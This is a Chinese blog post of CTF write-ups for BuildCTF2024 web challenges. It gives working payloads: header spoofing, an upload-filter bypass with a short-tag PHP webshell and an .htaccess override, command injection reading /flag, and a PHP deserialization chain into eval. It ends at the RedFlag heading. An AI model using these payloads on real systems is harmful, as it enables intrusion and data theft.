<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.2.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/luo.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/luo.jpg">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">
  <link rel="manifest" href="/manifest.json">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css" integrity="sha256-XOqroi11tY4EFQMR9ZYwZWKj5ZXiftSx36RRuC3anlA=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"luokuang1.github.io","root":"/","images":"/images","scheme":"Pisces","darkmode":false,"version":"8.20.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":true,"show_result":true,"style":"mac"},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideDownBigOut"}},"prism":false,"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="ez!http知识点 http头 最开始直接抓包通过repeater模块进行发包 通过修改提交的user值为root绕过第一层，或者直接修改js值 123456789101112131415161718192021&#x2F;&#x2F;只有从blog.buildctf.vip来的用户才可以访问通过Referer来进行伪造Referer: blog.buildctf.vip&#x2F;&#x2F;需要使用buildctf专用浏览器通过U">
<meta property="og:type" content="article">
<meta property="og:title" content="BuildCTF2024">
<meta property="og:url" content="https://luokuang1.github.io/2024/11/02/BuildCTF2024/index.html">
<meta property="og:site_name" content="luokuang的博客">
<meta property="og:description" content="ez!http知识点 http头 最开始直接抓包通过repeater模块进行发包 通过修改提交的user值为root绕过第一层，或者直接修改js值 123456789101112131415161718192021&#x2F;&#x2F;只有从blog.buildctf.vip来的用户才可以访问通过Referer来进行伪造Referer: blog.buildctf.vip&#x2F;&#x2F;需要使用buildctf专用浏览器通过U">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://luokuang1.github.io/images/build1.png">
<meta property="og:image" content="https://luokuang1.github.io/images/build2.png">
<meta property="og:image" content="https://luokuang1.github.io/images/build3.png">
<meta property="og:image" content="https://luokuang1.github.io/images/build4.png">
<meta property="og:image" content="https://luokuang1.github.io/images/build5.png">
<meta property="og:image" content="https://luokuang1.github.io/images/build6.png">
<meta property="og:image" content="https://luokuang1.github.io/images/build7.png">
<meta property="article:published_time" content="2024-11-02T09:18:11.000Z">
<meta property="article:modified_time" content="2024-11-05T09:26:33.500Z">
<meta property="article:author" content="luokuang">
<meta property="article:tag" content="ctf">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://luokuang1.github.io/images/build1.png">


<link rel="canonical" href="https://luokuang1.github.io/2024/11/02/BuildCTF2024/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"https://luokuang1.github.io/2024/11/02/BuildCTF2024/","path":"2024/11/02/BuildCTF2024/","title":"BuildCTF2024"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>BuildCTF2024 | luokuang的博客</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
<link rel="alternate" href="/atom.xml" title="luokuang的博客" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">luokuang的博客</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li><li class="menu-item menu-item-links"><a href="/links/" rel="section"><i class="fa fa-link fa-fw"></i>友链</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#ez-http"><span class="nav-number">1.</span> <span class="nav-text">ez!http</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#babyupload"><span class="nav-number">2.</span> <span class="nav-text">babyupload</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#find-the-id"><span class="nav-number">3.</span> <span class="nav-text">find-the-id</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%88%91%E5%86%99%E7%9A%84%E7%BD%91%E7%AB%99%E8%A2%ABrce%E4%BA%86%EF%BC%9F"><span class="nav-number">4.</span> <span class="nav-text">我写的网站被rce了？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#LovePopChain"><span class="nav-number">5.</span> <span class="nav-text">LovePopChain</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#RedFlag"><span class="nav-number">6.</span> <span class="nav-text">RedFlag</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Cookie-Factory"><span class="nav-number">7.</span> <span class="nav-text">Cookie_Factory</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Why-so-serials"><span class="nav-number">8.</span> <span class="nav-text">Why_so_serials?</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ez-md5"><span class="nav-number">9.</span> <span class="nav-text">ez_md5</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#eazyl0gin"><span class="nav-number">10.</span> <span class="nav-text">eazyl0gin</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%AE%E5%88%AE%E4%B9%90"><span class="nav-number">11.</span> <span class="nav-text">刮刮乐</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sub"><span class="nav-number">12.</span> <span class="nav-text">sub</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ez-waf"><span class="nav-number">13.</span> <span class="nav-text">ez_waf</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#tflock"><span class="nav-number">14.</span> <span class="nav-text">tflock</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="luokuang"
      src="/images/luo.jpg">
  <p class="site-author-name" itemprop="name">luokuang</p>
  <div class="site-description" itemprop="description">沉淀，还得继续沉淀</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">12</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="https://luokuang1.github.io/2024/11/02/BuildCTF2024/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/luo.jpg">
      <meta itemprop="name" content="luokuang">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="luokuang的博客">
      <meta itemprop="description" content="沉淀，还得继续沉淀">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="BuildCTF2024 | luokuang的博客">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          BuildCTF2024
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2024-11-02 17:18:11" itemprop="dateCreated datePublished" datetime="2024-11-02T17:18:11+08:00">2024-11-02</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">Edited on</span>
      <time title="Modified: 2024-11-05 17:26:33" itemprop="dateModified" datetime="2024-11-05T17:26:33+08:00">2024-11-05</time>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h3 id="ez-http"><a href="#ez-http" class="headerlink" title="ez!http"></a>ez!http</h3><p>知识点 http头</p>
<p>最开始直接抓包通过repeater模块进行发包</p>
<p>通过修改提交的user值为root绕过第一层，或者直接修改js值</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//只有从blog.buildctf.vip来的用户才可以访问</span></span><br><span class="line">通过Referer来进行伪造</span><br><span class="line">Referer: blog.buildctf.vip</span><br><span class="line"><span class="comment">//需要使用buildctf专用浏览器</span></span><br><span class="line">通过User-Agent来进行伪造</span><br><span class="line">User-Agent: buildctf</span><br><span class="line"><span class="comment">//只有来自内网的用户才能访问</span></span><br><span class="line">通过xff来伪造内网ip</span><br><span class="line">X-Forwarded-For: <span class="number">127.0</span>.<span class="number">0.1</span></span><br><span class="line"><span class="comment">//只接受2042.99.99这一天发送的请求</span></span><br><span class="line">通过Date来伪造时间</span><br><span class="line">Date: <span class="number">2042.99</span>.<span class="number">99</span></span><br><span class="line"><span class="comment">//只有发起请求的邮箱为root@buildctf.vip才能访问后台</span></span><br><span class="line">通过From来伪造邮箱</span><br><span class="line">From: root@buildctf.vip</span><br><span class="line"><span class="comment">//只接受代理为buildctf.via的请求</span></span><br><span class="line">通过Via来设置代理</span><br><span class="line">Via: buildctf.via</span><br><span class="line"><span class="comment">//浏览器只接受名为buildctf的语言</span></span><br><span class="line">通过Accept-Language来规定语言</span><br><span class="line">Accept-Language: buildctf</span><br></pre></td></tr></table></figure>
<p>最后直接添加post提交</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">This_is_flag</span><br></pre></td></tr></table></figure>
<p>最后的报文</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">POST / HTTP/<span class="number">1.1</span></span><br><span class="line">Host: <span class="number">27.25</span>.<span class="number">151.80</span>:<span class="number">37647</span></span><br><span class="line">Content-Length: <span class="number">30</span></span><br><span class="line">Cache-Control: max-age=<span class="number">0</span></span><br><span class="line">Upgrade-Insecure-Requests: <span class="number">1</span></span><br><span class="line">Origin: http:<span class="comment">//27.25.151.80:37647</span></span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">User-Agent: buildctf</span><br><span class="line">X-Forwarded-For: <span class="number">127.0</span>.<span class="number">0.1</span></span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=<span class="number">0.9</span>,image/avif,image/webp,image/apng,*<span class="comment">/*;q=0.8,application/signed-exchange;v=b3;q=0.7</span></span><br><span class="line"><span class="comment">Referer: blog.buildctf.vip</span></span><br><span class="line"><span class="comment">Accept-Encoding: gzip, deflate</span></span><br><span class="line"><span class="comment">Accept-Language: buildctf</span></span><br><span class="line"><span class="comment">Date: 2042.99.99</span></span><br><span class="line"><span class="comment">From: root<span class="doctag">@buildctf</span>.vip</span></span><br><span class="line"><span class="comment">Via: buildctf.via</span></span><br><span class="line"><span class="comment">Connection: close</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">user=root&amp;getFlag=This_is_flag</span></span><br></pre></td></tr></table></figure>
<h3 id="babyupload"><a href="#babyupload" class="headerlink" title="babyupload"></a>babyupload</h3><p>知识点为：.htaccess配置文件+短标签绕过</p>
<p>首先先上传一个.jpg文件，这个.jpg文件内容为我们的一句话木马，发现它输出一句不认识图片，这里已经修改为</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="title class_">Content</span>-<span class="title class_">Type</span>: image/jpeg 并且 后缀为.<span class="property">jpg</span>了，可能原因就是图片头的作用</span><br><span class="line">直接在文件开头添加 <span class="title class_">GIF89</span>a  即可</span><br></pre></td></tr></table></figure>
<p>可以尝试去绕过后缀,尝试修改为其它php形式的后缀，.php .phtml .php3,但是发现都步可以绕过，这里猜测源码里面有了白名单过滤，可能只能传jpg文件，这里也就可以猜测出可能要通过配置文件来进行解析我们上传的图片马</p>
<p>目前是这样的</p>
<p><img src="/images/build1.png" width="95%" height="80%"></p>
<p>现在就可以去尝试添加马在图片里面，这里发现提交有php的都会被waf，所以js头和简单的马都不可以写，就可以通过短标签进行绕过</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?= ?&gt;</span><br></pre></td></tr></table></figure>
<p>里面又继续进行了过滤，比如: system eval </p>
<p>所以我们可以通过反引号``来进行绕过,这里就完成了木马的上传</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?= <span class="string">`ls /`</span>;?&gt;</span><br></pre></td></tr></table></figure>
<p>上传配置文件，刚开始因为该目录下有upload.php以为可以直接上传.user.ini但是发现绕过不了，就可以尝试上传.htaccess文件，发现上传成功只需要修改</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="title class_">Content</span>-<span class="title class_">Type</span>: image/jpeg</span><br></pre></td></tr></table></figure>
<p>最后就是编写.htaccess文件内容，里面的qwe.jpg为上传的图片马的名字</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;<span class="title class_">FilesMatch</span> <span class="string">&quot;qwe.jpg&quot;</span>&gt;</span><br><span class="line">  <span class="title class_">SetHandler</span> application/x-httpd-php</span><br><span class="line">&lt;/<span class="title class_">FilesMatch</span>&gt;</span><br></pre></td></tr></table></figure>
<p>这里再去访问/uploads/qwe.jpg就发现命令执行了，但是找不到flag</p>
<p>尝试通过find命令来查找还是一样</p>
<p>最后发现在环境变量里面，通过export来即可</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?= <span class="string">`export`</span>;?&gt;</span><br></pre></td></tr></table></figure>
<p><img src="/images/build2.png" width="95%" height="80%"></p>
<p><img src="/images/build3.png" width="95%" height="80%"></p>
<h3 id="find-the-id"><a href="#find-the-id" class="headerlink" title="find-the-id"></a>find-the-id</h3><p>爆破题</p>
<p><img src="/images/build4.png" width="95%" height="80%"></p>
<p>这里要输入一个数字直接通过bp爆破模块即可</p>
<p><img src="/images/build5.png" width="95%" height="80%"></p>
<p>这里就可以确定为207，查看源码的flag</p>
<h3 id="我写的网站被rce了？"><a href="#我写的网站被rce了？" class="headerlink" title="我写的网站被rce了？"></a>我写的网站被rce了？</h3><p>rce管道符</p>
<p><img src="/images/build6.png" width="95%" height="80%"></p>
<p>这里有几个按钮，挨个点一次发现’查看日志’可以查看文件</p>
<p>抓报发现有一个参数，如果进行修改就发现一个提示</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">log_type=access</span><br><span class="line">/<span class="keyword">var</span>/log/nginx/ls.log该文件路径错误或不合法，请查看路径是否正确 </span><br></pre></td></tr></table></figure>
<p>猜测这里是通过拼接命令进行执行命令，但是过滤;&amp;&amp;也不能有就可以尝试通过||来进行命令，因为后面的.log的进行拼接去除所以就可以通过</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">||ls|| <span class="comment">//发现报错但是执行成功</span></span><br></pre></td></tr></table></figure>
<p>尝试知道这里过滤了空格和flag cat tac 用nl来读取${IFS}绕过空格,?来绕过flag</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">||nl$&#123;IFS&#125;/f???||</span><br></pre></td></tr></table></figure>
<h3 id="LovePopChain"><a href="#LovePopChain" class="headerlink" title="LovePopChain"></a>LovePopChain</h3><p>PHP反序列化</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">MyObject</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$NoLove</span>=<span class="string">&quot;Do_You_Want_Fl4g?&quot;</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$Forgzy</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="variable language_">$this</span>-&gt;NoLove == <span class="string">&quot;Do_You_Want_Fl4g?&quot;</span>)&#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&#x27;Love but not getting it!!&#x27;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__invoke</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;Forgzy = <span class="keyword">clone</span> <span class="keyword">new</span> <span class="title class_">GaoZhouYue</span>();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">GaoZhouYue</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$Yuer</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$LastOne</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__clone</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&#x27;最后一次了, 爱而不得, 未必就是遗憾~~&#x27;</span>;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;y3y4&#x27;</span>]);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">hybcx</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$JiuYue</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$Si</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__call</span>(<span class="params"><span class="variable">$fun1</span>,<span class="variable">$arg</span></span>)</span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;Si-&gt;JiuYue=<span class="variable">$arg</span>[<span class="number">0</span>];</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="variable">$ai</span> = <span class="variable language_">$this</span>-&gt;Si;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&#x27;I W1ll remember you&#x27;</span>;</span><br><span class="line">        <span class="keyword">return</span> <span class="variable">$ai</span>();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;No_Need.For.Love&#x27;</span>]))&#123;</span><br><span class="line">    @<span class="title function_ invoke__">unserialize</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;No_Need.For.Love&#x27;</span>]);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>先逆向分析链子</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="title class_">GaoZhouYue</span>::<span class="title function_ invoke__">_clone</span>()-&gt;<span class="title class_">MyObject</span>::<span class="title function_ invoke__">__invoke</span>()-&gt;hybcx::<span class="title function_ invoke__">__toString</span>()-&gt;<span class="title class_">MyObject</span>::<span class="title function_ invoke__">__wakeup</span>()</span><br></pre></td></tr></table></figure>
<p>最后需要在GaoZhouYue::_clone()里面执行命令，而调用<strong>clone()魔术方法需要在调用clone方法时被调用，在MyObject::</strong>invoke()里面调用了clone，hybcx::<strong>toString()里面出现将类以函数的方法进行调用，MyObject::</strong>wakeup()最后通过比较字符串调用__toString()</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">MyObject</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$NoLove</span>=<span class="string">&quot;Do_You_Want_Fl4g?&quot;</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$Forgzy</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">GaoZhouYue</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$Yuer</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$LastOne</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">hybcx</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$JiuYue</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$Si</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$a</span>=<span class="keyword">new</span> <span class="title class_">MyObject</span>();</span><br><span class="line"><span class="variable">$a</span>-&gt;NoLove=<span class="keyword">new</span> <span class="title function_ invoke__">hybcx</span>();</span><br><span class="line"><span class="variable">$a</span>-&gt;NoLove-&gt;Si=<span class="keyword">new</span> <span class="title class_">MyObject</span>();</span><br><span class="line"><span class="variable">$a</span>-&gt;NoLove-&gt;Si-&gt;Forgzy=<span class="keyword">new</span> <span class="title class_">GaoZhouYue</span>();</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">serialize</span>(<span class="variable">$a</span>);</span><br><span class="line"><span class="comment">// O:8:&quot;MyObject&quot;:2:&#123;s:6:&quot;NoLove&quot;;O:5:&quot;hybcx&quot;:2:&#123;s:6:&quot;JiuYue&quot;;N;s:2:&quot;Si&quot;;O:8:&quot;MyObject&quot;:2:&#123;s:6:&quot;NoLove&quot;;s:17:&quot;Do_You_Want_Fl4g?&quot;;s:6:&quot;Forgzy&quot;;O:10:&quot;GaoZhouYue&quot;:2:&#123;s:4:&quot;Yuer&quot;;N;s:7:&quot;LastOne&quot;;N;&#125;&#125;&#125;s:6:&quot;Forgzy&quot;;N;&#125;</span></span><br></pre></td></tr></table></figure>
<p>最后就通过修改参数使其合法得</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">No[Need.For.Love=O:<span class="number">8</span>:<span class="string">&quot;MyObject&quot;</span>:<span class="number">2</span>:&#123;s:<span class="number">6</span>:<span class="string">&quot;NoLove&quot;</span>;O:<span class="number">5</span>:<span class="string">&quot;hybcx&quot;</span>:<span class="number">2</span>:&#123;s:<span class="number">6</span>:<span class="string">&quot;JiuYue&quot;</span>;N;s:<span class="number">2</span>:<span class="string">&quot;Si&quot;</span>;O:<span class="number">8</span>:<span class="string">&quot;MyObject&quot;</span>:<span class="number">2</span>:&#123;s:<span class="number">6</span>:<span class="string">&quot;NoLove&quot;</span>;s:<span class="number">17</span>:<span class="string">&quot;Do_You_Want_Fl4g?&quot;</span>;s:<span class="number">6</span>:<span class="string">&quot;Forgzy&quot;</span>;O:<span class="number">10</span>:<span class="string">&quot;GaoZhouYue&quot;</span>:<span class="number">2</span>:&#123;s:<span class="number">4</span>:<span class="string">&quot;Yuer&quot;</span>;N;s:<span class="number">7</span>:<span class="string">&quot;LastOne&quot;</span>;N;&#125;&#125;&#125;s:<span class="number">6</span>:<span class="string">&quot;Forgzy&quot;</span>;N;&#125;</span><br></pre></td></tr></table></figure>
<p>post提交</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">y3y4=<span class="title function_ invoke__">system</span>(<span class="string">&#x27;cat /*&#x27;</span>);</span><br></pre></td></tr></table></figure>
<h3 id="RedFlag"><a href="#RedFlag" class="headerlink" title="RedFlag"></a>RedFlag</h3><p>ssti</p>
